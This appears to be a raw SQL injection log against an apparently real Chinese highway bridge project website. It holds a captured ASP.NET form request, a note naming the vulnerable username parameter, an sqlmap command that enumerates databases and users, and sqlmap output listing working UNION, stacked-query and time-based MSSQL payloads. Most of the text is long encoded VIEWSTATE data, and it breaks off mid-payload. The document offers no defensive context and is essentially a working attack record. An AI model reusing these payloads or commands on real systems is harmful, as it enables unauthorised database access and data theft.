qGl6aG555uu5oqV6K%2BJ44CB5Li%2B5oql5Y%2BX55CG5LiA6KeI6KGoZGQCAw9kFgRmDxUCX%2BWFs%2BS6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWbouesrOS4gOW3peeoi%2BaciemZkOWFrOWPuEEz5ZCI5ZCM5q616aG555uu57uP55CG6YOo55qE5Yaz5a6aGVQyMDEwMDYwOTE1NDcxNzQ0MTAwMDA1NzFkAgIPDxYEHwEFJ%2BWFs%2BS6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWboi4uLh8CBV%2FlhbPkuo7ooajlvbDkuK3pk4HkuozljYHkuInlsYDpm4blm6LnrKzkuIDlt6XnqIvmnInpmZDlhazlj7hBM%2BWQiOWQjOautemhueebrue7j%2BeQhumDqOeahOWGs%2BWummRkAgQPZBYEZg8VAocB5YWz5LqO6KGo5b2w5Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5qGl6aG555uu56ys5LiA6Zi25q615YWI6L%2Bb6ZuG5L2T5ZKM5YWI6L%2Bb5Liq5Lq655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5rGf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y%2B377yJGVQyMDExMDQyMzE2MzUwMDI0MTAwMDAxOTRkAgIPDxYEHwEFJ%2BWFs%2BS6juihqOW9sOS5neaxn%2BmVv%2Baxn%2BWFrOi3r%2BWkp%2BahpS4uLh8CBYcB5YWz5LqO6KGo5b2w5Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5qGl6aG555uu56ys5LiA6Zi25q615YWI6L%2Bb6ZuG5L2T5ZKM5YWI6L%2Bb5Liq5Lq655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5rGf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y%2B377yJZGQCBQ9kFgZmDxUCEuS4lueVjOWNgeWkp%2BahpeaigRlUMjAwOTAzMjQyMzA3MDQzNDEwMDAwMTk0ZAIBDw8WAh8EaGRkAgIPDxYEHwEFEuS4lueVjOWNgeWkp%2BahpeaigR8CBRLkuJbnlYzljYHlpKfmoaXmooFkZAIGD2QWBmYPFQK5Aeemj%2BW3nuiHs%2BmTtuW3nemrmOmAn%2BWFrOi3r%2BS5neaxn%2BmVv%2Baxn%2BWFrOi3r%2BWkp%2BahpSjmsZ%2Fopb%2FmrrUp5aSn5Z6L5pSv5bqn44CB5oi%2F5bu65Y%2BK5YW26ZmE5bGe5bel56iL5pa95bel55uR55CG44CB5oi%2F5bu65Y%2BK5YW26ZmE5bGe5bel56iL5pa95bel44CB57u%2F5YyW5bel56iL5pa95bel5oub5qCH57uT5p6c5YWs56S6GVQyMDExMDMxMDA4NDM0NjA5MTAwMDAxOTRkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP5bee6Iez6ZO25bed6auY6YCf5YWs6Lev5Lmd5rGf6ZW%2FLi4uHwIFuQHnpo%2Flt57oh7Ppk7blt53pq5jpgJ%2Flhazot6%2FkuZ3msZ%2Fplb%2FmsZ%2Flhazot6%2FlpKfmoaUo5rGf6KW%2F5q61KeWkp%2BWei%2BaUr%2BW6p%2BOAgeaIv%2BW7uuWPiuWFtumZhOWxnuW3peeoi%2BaWveW3peebkeeQhuOAgeaIv%2BW7uuWPiuWFtumZhOWxnuW3peeoi%2BaWveW3peOAgee7v%2BWMluW3peeoi%2BaWveW3peaLm%2Bagh%2Be7k%2BaenOWFrOekumRkAgcPZBYGZg8VAiTkuZ3msZ%2Fplb%2FmsZ%2Flhazot6%2FlpKfmoaXpobnnm67mlofljJYZVDIwMDkwODA1MTY0NjUzNDgxMDAwMDE5NGQCAQ8PFgIfBGhkZAICDw8WBB8BBSTkuZ3msZ%2Fplb%2FmsZ%2Flhazot6%2FlpKfmoaXpobnnm67mlofljJYfAgUk5Lmd5rGf6ZW%2F5rGf5YWs6Lev5aSn5qGl6aG555uu5paH5YyWZGRkInztdye2D%2F7fEQxfA5JDVonN3Rk%3D&__EVENTVALIDATION=%2FwEWBgL7nfzqCALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB5BL2NzThhveVR8MpohjjNYFGSsq&txtKeyWord=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&ctl00%24holderContent%24txtUserName=a&ctl00%24holderContent%24txtPassword=a&ctl00%24holderContent%24txtNewPassword=s&ctl00%24holderContent%24txtConfirmPassword=s
注入点ctl00%24holderContent%24txtUserName
Sqlmap py -r g:\1s.txt -p "ctl00%24holderContent%24txtUserName" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 105 HTTP(s) req
uests:
---
Place: POST
Parameter: ctl00$holderContent$txtUserName
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExD2QWAmYPZBYCAgMPZBYEZg8WAh4LXyFJdGVtQ291bnQCARYCZg9kFg
RmDxUBGVQyMDExMDEyNDExMjMyMTMwMTAwMDEzNTBkAgEPDxYEHgRUZXh0BZkD6I2j6KqJ5qac77yaMj
AxMuW5tDktMTDmnIjkvJjog5zmlr3lt6XljZXkvY3vvJrnrKzkuIDlkI3vvJpCMuWQiOWQjOauteKAlO
KAlOS4reS6pOesrOS6jOiIquWKoeW3peeoi+WxgOaciemZkOWFrOWPuO+8jOesrOS6jOWQje+8mkEx5Z
CI5ZCM5q614oCU4oCU6Lev5qGl5Y2O5Y2X5bel56iL5pyJ6ZmQ5YWs5Y+477yM56ys5LiJ5ZCN77yaQj
PlkIjlkIzmrrXigJTigJTkuK3pk4HkuIDlsYDpm4blm6LmoaXmooHlt6XnqIvmnInpmZDlhazlj7jjgI
FQMeWQiOWQjOauteKAlOKAlOaxn+ilv+i1o+eypOmrmOmAn+WFrOi3r+W3peeoi+aciemZkOi0o+S7u+
WFrOWPuOOAgiDkvJjog5znm5HnkIbljZXkvY3vvJpSMempu+WcsOWKnuKAlOKAlOaxn+ilv+ecgeWYie
WSjOW3peeoi+WSqOivouebkeeQhuaciemZkOWFrOWPuOOAgh4HVG9vbFRpcAWZA+iNo+iqieamnO+8mj
IwMTLlubQ5LTEw5pyI5LyY6IOc5pa95bel5Y2V5L2N77ya56ys5LiA5ZCN77yaQjLlkIjlkIzmrrXigJ
TigJTkuK3kuqTnrKzkuozoiKrliqHlt6XnqIvlsYDmnInpmZDlhazlj7jvvIznrKzkuozlkI3vvJpBMe
WQiOWQjOauteKAlOKAlOi3r+ahpeWNjuWNl+W3peeoi+aciemZkOWFrOWPuO+8jOesrOS4ieWQje+8mk
Iz5ZCI5ZCM5q614oCU4oCU5Lit6ZOB5LiA5bGA6ZuG5Zui5qGl5qKB5bel56iL5pyJ6ZmQ5YWs5Y+444
CBUDHlkIjlkIzmrrXigJTigJTmsZ/opb/otaPnsqTpq5jpgJ/lhazot6/lt6XnqIvmnInpmZDotKPku7
vlhazlj7jjgIIg5LyY6IOc55uR55CG5Y2V5L2N77yaUjHpqbvlnLDlip7igJTigJTmsZ/opb/nnIHlmI
nlkozlt6XnqIvlkqjor6Lnm5HnkIbmnInpmZDlhazlj7jjgIJkZAIBD2QWBGYPPCsACQEADxYEHghEYX
RhS2V5cxYAHwACBmQWDGYPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1YWEdHBu
WFrOWRimQCAQ9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVhXR0oM5paw6Ze75b
m/6KeSZAICD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WVhKSgzkuIDnur/ogZ
rnhKZkAgMPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1NVFpTDOWqkuS9k+S5i+
WjsGQCBA9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVJXVFgM5Lq654mp54m55Y
aZZAIFD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WU5aWAzkuJrlhoXotYTorq
9kAgEPPCsACQEADxYEHwMWAB8AAghkFhBmD2QWBmYPFQIWMjAwOOW5tOW6puW3peS9nOi/m+WxlRlUMj
AwOTA0MTYwODU2MDA4OTEwMDAwNDY4ZAIBDw8WAh4HVmlzaWJsZWhkZAICDw8WBB8BBRYyMDA45bm05b
qm5bel5L2c6L+b5bGVHwIFFjIwMDjlubTluqblt6XkvZzov5vlsZVkZAIBD2QWBmYPFQIw56aP6ZO26a
uY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu566A5LuLGVQyMDA5MDQxNjE2NDQ1MTk4MT
AwMDM1MTNkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP6ZO26auY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5a
Sn5qGlLi4uHwIFMOemj+mTtumrmOmAn+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpemhueebrueugOS7i2
RkAgIPZBYGZg8VAjzkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4njgIHkuL7miqXlj5
fnkIbkuIDop4jooagZVDIwMTEwMzMwMTE1MzE5MzExMDAwMDkyMWQCAQ8PFgIfBGhkZAICDw8WBB8BBS
fkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4kuLi4fAgU85Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5oqV6K+J44CB5Li+5oql5Y+X55CG5LiA6KeI6KGoZGQCAw9kFgRmDxUCX+WFs+
S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWbouesrOS4gOW3peeoi+aciemZkOWFrOWPuEEz5Z
CI5ZCM5q616aG555uu57uP55CG6YOo55qE5Yaz5a6aGVQyMDEwMDYwOTE1NDcxNzQ0MTAwMDA1NzFkAg
IPDxYEHwEFJ+WFs+S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWboi4uLh8CBV/lhbPkuo7ooa
jlvbDkuK3pk4HkuozljYHkuInlsYDpm4blm6LnrKzkuIDlt6XnqIvmnInpmZDlhazlj7hBM+WQiOWQjO
autemhueebrue7j+eQhumDqOeahOWGs+WummRkAgQPZBYEZg8VAocB5YWz5LqO6KGo5b2w5Lmd5rGf6Z
W/5rGf5YWs6Lev5aSn5qGl6aG555uu56ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5L
q655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5rGf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJGVQyMD
ExMDQyMzE2MzUwMDI0MTAwMDAxOTRkAgIPDxYEHwEFJ+WFs+S6juihqOW9sOS5neaxn+mVv+axn+WFrO
i3r+Wkp+ahpS4uLh8CBYcB5YWz5LqO6KGo5b2w5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu56
ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5Lq655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5r
Gf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJZGQCBQ9kFgZmDxUCEuS4lueVjOWNgeWkp+ahpe
aigRlUMjAwOTAzMjQyMzA3MDQzNDEwMDAwMTk0ZAIBDw8WAh8EaGRkAgIPDxYEHwEFEuS4lueVjOWNge
Wkp+ahpeaigR8CBRLkuJbnlYzljYHlpKfmoaXmooFkZAIGD2QWBmYPFQK5Aeemj+W3nuiHs+mTtuW3ne
mrmOmAn+WFrOi3r+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpSjmsZ/opb/mrrUp5aSn5Z6L5pSv5bqn44
CB5oi/5bu65Y+K5YW26ZmE5bGe5bel56iL5pa95bel55uR55CG44CB5oi/5bu65Y+K5YW26ZmE5bGe5b
el56iL5pa95bel44CB57u/5YyW5bel56iL5pa95bel5oub5qCH57uT5p6c5YWs56S6GVQyMDExMDMxMD
A4NDM0NjA5MTAwMDAxOTRkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP5bee6Iez6ZO25bed6auY6YCf5Y
Ws6Lev5Lmd5rGf6ZW/Li4uHwIFuQHnpo/lt57oh7Ppk7blt53pq5jpgJ/lhazot6/kuZ3msZ/plb/msZ
/lhazot6/lpKfmoaUo5rGf6KW/5q61KeWkp+Wei+aUr+W6p+OAgeaIv+W7uuWPiuWFtumZhOWxnuW3pe
eoi+aWveW3peebkeeQhuOAgeaIv+W7uuWPiuWFtumZhOWxnuW3peeoi+aWveW3peOAgee7v+WMluW3pe
eoi+aWveW3peaLm+agh+e7k+aenOWFrOekumRkAgcPZBYGZg8VAiTkuZ3msZ/plb/msZ/lhazot6/lpK
fmoaXpobnnm67mlofljJYZVDIwMDkwODA1MTY0NjUzNDgxMDAwMDE5NGQCAQ8PFgIfBGhkZAICDw8WBB
8BBSTkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mlofljJYfAgUk5Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5paH5YyWZGRkInztdye2D/7fEQxfA5JDVonN3Rk=&__EVENTVALIDATION=/wE
WBgL7nfzqCALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB5BL2NzThhveVR8MpohjjNYFGSsq&tx
tKeyWord=??????&ctl00$holderContent$txtUserName=a') UNION ALL SELECT NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(106)+
CHAR(117)+CHAR(110)+CHAR(58)+CHAR(66)+CHAR(71)+CHAR(79)+CHAR(74)+CHAR(66)+CHAR(8
8)+CHAR(65)+CHAR(102)+CHAR(107)+CHAR(107)+CHAR(58)+CHAR(100)+CHAR(99)+CHAR(101)+
CHAR(58), NULL, NULL-- &ctl00$holderContent$txtPassword=a&ctl00$holderContent$tx
tNewPassword=s&ctl00$holderContent$txtConfirmPassword=s
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExD2QWAmYPZBYCAgMPZBYEZg8WAh4LXyFJdGVtQ291bnQCARYCZg9kFg
RmDxUBGVQyMDExMDEyNDExMjMyMTMwMTAwMDEzNTBkAgEPDxYEHgRUZXh0BZkD6I2j6KqJ5qac77yaMj
AxMuW5tDktMTDmnIjkvJjog5zmlr3lt6XljZXkvY3vvJrnrKzkuIDlkI3vvJpCMuWQiOWQjOauteKAlO
KAlOS4reS6pOesrOS6jOiIquWKoeW3peeoi+WxgOaciemZkOWFrOWPuO+8jOesrOS6jOWQje+8mkEx5Z
CI5ZCM5q614oCU4oCU6Lev5qGl5Y2O5Y2X5bel56iL5pyJ6ZmQ5YWs5Y+477yM56ys5LiJ5ZCN77yaQj
PlkIjlkIzmrrXigJTigJTkuK3pk4HkuIDlsYDpm4blm6LmoaXmooHlt6XnqIvmnInpmZDlhazlj7jjgI
FQMeWQiOWQjOauteKAlOKAlOaxn+ilv+i1o+eypOmrmOmAn+WFrOi3r+W3peeoi+aciemZkOi0o+S7u+
WFrOWPuOOAgiDkvJjog5znm5HnkIbljZXkvY3vvJpSMempu+WcsOWKnuKAlOKAlOaxn+ilv+ecgeWYie
WSjOW3peeoi+WSqOivouebkeeQhuaciemZkOWFrOWPuOOAgh4HVG9vbFRpcAWZA+iNo+iqieamnO+8mj
IwMTLlubQ5LTEw5pyI5LyY6IOc5pa95bel5Y2V5L2N77ya56ys5LiA5ZCN77yaQjLlkIjlkIzmrrXigJ
TigJTkuK3kuqTnrKzkuozoiKrliqHlt6XnqIvlsYDmnInpmZDlhazlj7jvvIznrKzkuozlkI3vvJpBMe
WQiOWQjOauteKAlOKAlOi3r+ahpeWNjuWNl+W3peeoi+aciemZkOWFrOWPuO+8jOesrOS4ieWQje+8mk
Iz5ZCI5ZCM5q614oCU4oCU5Lit6ZOB5LiA5bGA6ZuG5Zui5qGl5qKB5bel56iL5pyJ6ZmQ5YWs5Y+444
CBUDHlkIjlkIzmrrXigJTigJTmsZ/opb/otaPnsqTpq5jpgJ/lhazot6/lt6XnqIvmnInpmZDotKPku7
vlhazlj7jjgIIg5LyY6IOc55uR55CG5Y2V5L2N77yaUjHpqbvlnLDlip7igJTigJTmsZ/opb/nnIHlmI
nlkozlt6XnqIvlkqjor6Lnm5HnkIbmnInpmZDlhazlj7jjgIJkZAIBD2QWBGYPPCsACQEADxYEHghEYX
RhS2V5cxYAHwACBmQWDGYPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1YWEdHBu
WFrOWRimQCAQ9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVhXR0oM5paw6Ze75b
m/6KeSZAICD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WVhKSgzkuIDnur/ogZ
rnhKZkAgMPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1NVFpTDOWqkuS9k+S5i+
WjsGQCBA9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVJXVFgM5Lq654mp54m55Y
aZZAIFD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WU5aWAzkuJrlhoXotYTorq
9kAgEPPCsACQEADxYEHwMWAB8AAghkFhBmD2QWBmYPFQIWMjAwOOW5tOW6puW3peS9nOi/m+WxlRlUMj
AwOTA0MTYwODU2MDA4OTEwMDAwNDY4ZAIBDw8WAh4HVmlzaWJsZWhkZAICDw8WBB8BBRYyMDA45bm05b
qm5bel5L2c6L+b5bGVHwIFFjIwMDjlubTluqblt6XkvZzov5vlsZVkZAIBD2QWBmYPFQIw56aP6ZO26a
uY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu566A5LuLGVQyMDA5MDQxNjE2NDQ1MTk4MT
AwMDM1MTNkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP6ZO26auY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5a
Sn5qGlLi4uHwIFMOemj+mTtumrmOmAn+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpemhueebrueugOS7i2
RkAgIPZBYGZg8VAjzkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4njgIHkuL7miqXlj5
fnkIbkuIDop4jooagZVDIwMTEwMzMwMTE1MzE5MzExMDAwMDkyMWQCAQ8PFgIfBGhkZAICDw8WBB8BBS
fkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4kuLi4fAgU85Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5oqV6K+J44CB5Li+5oql5Y+X55CG5LiA6KeI6KGoZGQCAw9kFgRmDxUCX+WFs+
S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWbouesrOS4gOW3peeoi+aciemZkOWFrOWPuEEz5Z
CI5ZCM5q616aG555uu57uP55CG6YOo55qE5Yaz5a6aGVQyMDEwMDYwOTE1NDcxNzQ0MTAwMDA1NzFkAg
IPDxYEHwEFJ+WFs+S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWboi4uLh8CBV/lhbPkuo7ooa
jlvbDkuK3pk4HkuozljYHkuInlsYDpm4blm6LnrKzkuIDlt6XnqIvmnInpmZDlhazlj7hBM+WQiOWQjO
autemhueebrue7j+eQhumDqOeahOWGs+WummRkAgQPZBYEZg8VAocB5YWz5LqO6KGo5b2w5Lmd5rGf6Z
W/5rGf5YWs6Lev5aSn5qGl6aG555uu56ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5L
q655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5rGf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJGVQyMD
ExMDQyMzE2MzUwMDI0MTAwMDAxOTRkAgIPDxYEHwEFJ+WFs+S6juihqOW9sOS5neaxn+mVv+axn+WFrO
i3r+Wkp+ahpS4uLh8CBYcB5YWz5LqO6KGo5b2w5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu56
ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5Lq655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5r
Gf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJZGQCBQ9kFgZmDxUCEuS4lueVjOWNgeWkp+ahpe
aigRlUMjAwOTAzMjQyMzA3MDQzNDEwMDAwMTk0ZAIBDw8WAh8EaGRkAgIPDxYEHwEFEuS4lueVjOWNge
Wkp+ahpeaigR8CBRLkuJbnlYzljYHlpKfmoaXmooFkZAIGD2QWBmYPFQK5Aeemj+W3nuiHs+mTtuW3ne
mrmOmAn+WFrOi3r+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpSjmsZ/opb/mrrUp5aSn5Z6L5pSv5bqn44
CB5oi/5bu65Y+K5YW26ZmE5bGe5bel56iL5pa95bel55uR55CG44CB5oi/5bu65Y+K5YW26ZmE5bGe5b
el56iL5pa95bel44CB57u/5YyW5bel56iL5pa95bel5oub5qCH57uT5p6c5YWs56S6GVQyMDExMDMxMD
A4NDM0NjA5MTAwMDAxOTRkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP5bee6Iez6ZO25bed6auY6YCf5Y
Ws6Lev5Lmd5rGf6ZW/Li4uHwIFuQHnpo/lt57oh7Ppk7blt53pq5jpgJ/lhazot6/kuZ3msZ/plb/msZ
/lhazot6/lpKfmoaUo5rGf6KW/5q61KeWkp+Wei+aUr+W6p+OAgeaIv+W7uuWPiuWFtumZhOWxnuW3pe
eoi+aWveW3peebkeeQhuOAgeaIv+W7uuWPiuWFtumZhOWxnuW3peeoi+aWveW3peOAgee7v+WMluW3pe
eoi+aWveW3peaLm+agh+e7k+aenOWFrOekumRkAgcPZBYGZg8VAiTkuZ3msZ/plb/msZ/lhazot6/lpK
fmoaXpobnnm67mlofljJYZVDIwMDkwODA1MTY0NjUzNDgxMDAwMDE5NGQCAQ8PFgIfBGhkZAICDw8WBB
8BBSTkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mlofljJYfAgUk5Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5paH5YyWZGRkInztdye2D/7fEQxfA5JDVonN3Rk=&__EVENTVALIDATION=/wE
WBgL7nfzqCALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB5BL2NzThhveVR8MpohjjNYFGSsq&tx
tKeyWord=??????&ctl00$holderContent$txtUserName=a'); WAITFOR DELAY '0:0:5';--&ct
l00$holderContent$txtPassword=a&ctl00$holderContent$txtNewPassword=s&ctl00$holde
rContent$txtConfirmPassword=s
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=ctl00$holderContent$btnModify&__EVENTARGUMENT=&__VIEW
STATE=/wEPDwUJMzQzMDQ1MDExD2QWAmYPZBYCAgMPZBYEZg8WAh4LXyFJdGVtQ291bnQCARYCZg9kFg
RmDxUBGVQyMDExMDEyNDExMjMyMTMwMTAwMDEzNTBkAgEPDxYEHgRUZXh0BZkD6I2j6KqJ5qac77yaMj
AxMuW5tDktMTDmnIjkvJjog5zmlr3lt6XljZXkvY3vvJrnrKzkuIDlkI3vvJpCMuWQiOWQjOauteKAlO
KAlOS4reS6pOesrOS6jOiIquWKoeW3peeoi+WxgOaciemZkOWFrOWPuO+8jOesrOS6jOWQje+8mkEx5Z
CI5ZCM5q614oCU4oCU6Lev5qGl5Y2O5Y2X5bel56iL5pyJ6ZmQ5YWs5Y+477yM56ys5LiJ5ZCN77yaQj
PlkIjlkIzmrrXigJTigJTkuK3pk4HkuIDlsYDpm4blm6LmoaXmooHlt6XnqIvmnInpmZDlhazlj7jjgI
FQMeWQiOWQjOauteKAlOKAlOaxn+ilv+i1o+eypOmrmOmAn+WFrOi3r+W3peeoi+aciemZkOi0o+S7u+
WFrOWPuOOAgiDkvJjog5znm5HnkIbljZXkvY3vvJpSMempu+WcsOWKnuKAlOKAlOaxn+ilv+ecgeWYie
WSjOW3peeoi+WSqOivouebkeeQhuaciemZkOWFrOWPuOOAgh4HVG9vbFRpcAWZA+iNo+iqieamnO+8mj
IwMTLlubQ5LTEw5pyI5LyY6IOc5pa95bel5Y2V5L2N77ya56ys5LiA5ZCN77yaQjLlkIjlkIzmrrXigJ
TigJTkuK3kuqTnrKzkuozoiKrliqHlt6XnqIvlsYDmnInpmZDlhazlj7jvvIznrKzkuozlkI3vvJpBMe
WQiOWQjOauteKAlOKAlOi3r+ahpeWNjuWNl+W3peeoi+aciemZkOWFrOWPuO+8jOesrOS4ieWQje+8mk
Iz5ZCI5ZCM5q614oCU4oCU5Lit6ZOB5LiA5bGA6ZuG5Zui5qGl5qKB5bel56iL5pyJ6ZmQ5YWs5Y+444
CBUDHlkIjlkIzmrrXigJTigJTmsZ/opb/otaPnsqTpq5jpgJ/lhazot6/lt6XnqIvmnInpmZDotKPku7
vlhazlj7jjgIIg5LyY6IOc55uR55CG5Y2V5L2N77yaUjHpqbvlnLDlip7igJTigJTmsZ/opb/nnIHlmI
nlkozlt6XnqIvlkqjor6Lnm5HnkIbmnInpmZDlhazlj7jjgIJkZAIBD2QWBGYPPCsACQEADxYEHghEYX
RhS2V5cxYAHwACBmQWDGYPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1YWEdHBu
WFrOWRimQCAQ9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVhXR0oM5paw6Ze75b
m/6KeSZAICD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WVhKSgzkuIDnur/ogZ
rnhKZkAgMPZBYCZg8VAiIvV2ViVUkvQXJ0aWNsZS5hc3B4P01LQk1fQ09ERT1NVFpTDOWqkuS9k+S5i+
WjsGQCBA9kFgJmDxUCIi9XZWJVSS9BcnRpY2xlLmFzcHg/TUtCTV9DT0RFPVJXVFgM5Lq654mp54m55Y
aZZAIFD2QWAmYPFQIiL1dlYlVJL0FydGljbGUuYXNweD9NS0JNX0NPREU9WU5aWAzkuJrlhoXotYTorq
9kAgEPPCsACQEADxYEHwMWAB8AAghkFhBmD2QWBmYPFQIWMjAwOOW5tOW6puW3peS9nOi/m+WxlRlUMj
AwOTA0MTYwODU2MDA4OTEwMDAwNDY4ZAIBDw8WAh4HVmlzaWJsZWhkZAICDw8WBB8BBRYyMDA45bm05b
qm5bel5L2c6L+b5bGVHwIFFjIwMDjlubTluqblt6XkvZzov5vlsZVkZAIBD2QWBmYPFQIw56aP6ZO26a
uY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu566A5LuLGVQyMDA5MDQxNjE2NDQ1MTk4MT
AwMDM1MTNkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP6ZO26auY6YCf5Lmd5rGf6ZW/5rGf5YWs6Lev5a
Sn5qGlLi4uHwIFMOemj+mTtumrmOmAn+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpemhueebrueugOS7i2
RkAgIPZBYGZg8VAjzkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4njgIHkuL7miqXlj5
fnkIbkuIDop4jooagZVDIwMTEwMzMwMTE1MzE5MzExMDAwMDkyMWQCAQ8PFgIfBGhkZAICDw8WBB8BBS
fkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mipXor4kuLi4fAgU85Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5oqV6K+J44CB5Li+5oql5Y+X55CG5LiA6KeI6KGoZGQCAw9kFgRmDxUCX+WFs+
S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWbouesrOS4gOW3peeoi+aciemZkOWFrOWPuEEz5Z
CI5ZCM5q616aG555uu57uP55CG6YOo55qE5Yaz5a6aGVQyMDEwMDYwOTE1NDcxNzQ0MTAwMDA1NzFkAg
IPDxYEHwEFJ+WFs+S6juihqOW9sOS4remTgeS6jOWNgeS4ieWxgOmbhuWboi4uLh8CBV/lhbPkuo7ooa
jlvbDkuK3pk4HkuozljYHkuInlsYDpm4blm6LnrKzkuIDlt6XnqIvmnInpmZDlhazlj7hBM+WQiOWQjO
autemhueebrue7j+eQhumDqOeahOWGs+WummRkAgQPZBYEZg8VAocB5YWz5LqO6KGo5b2w5Lmd5rGf6Z
W/5rGf5YWs6Lev5aSn5qGl6aG555uu56ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5L
q655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5rGf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJGVQyMD
ExMDQyMzE2MzUwMDI0MTAwMDAxOTRkAgIPDxYEHwEFJ+WFs+S6juihqOW9sOS5neaxn+mVv+axn+WFrO
i3r+Wkp+ahpS4uLh8CBYcB5YWz5LqO6KGo5b2w5Lmd5rGf6ZW/5rGf5YWs6Lev5aSn5qGl6aG555uu56
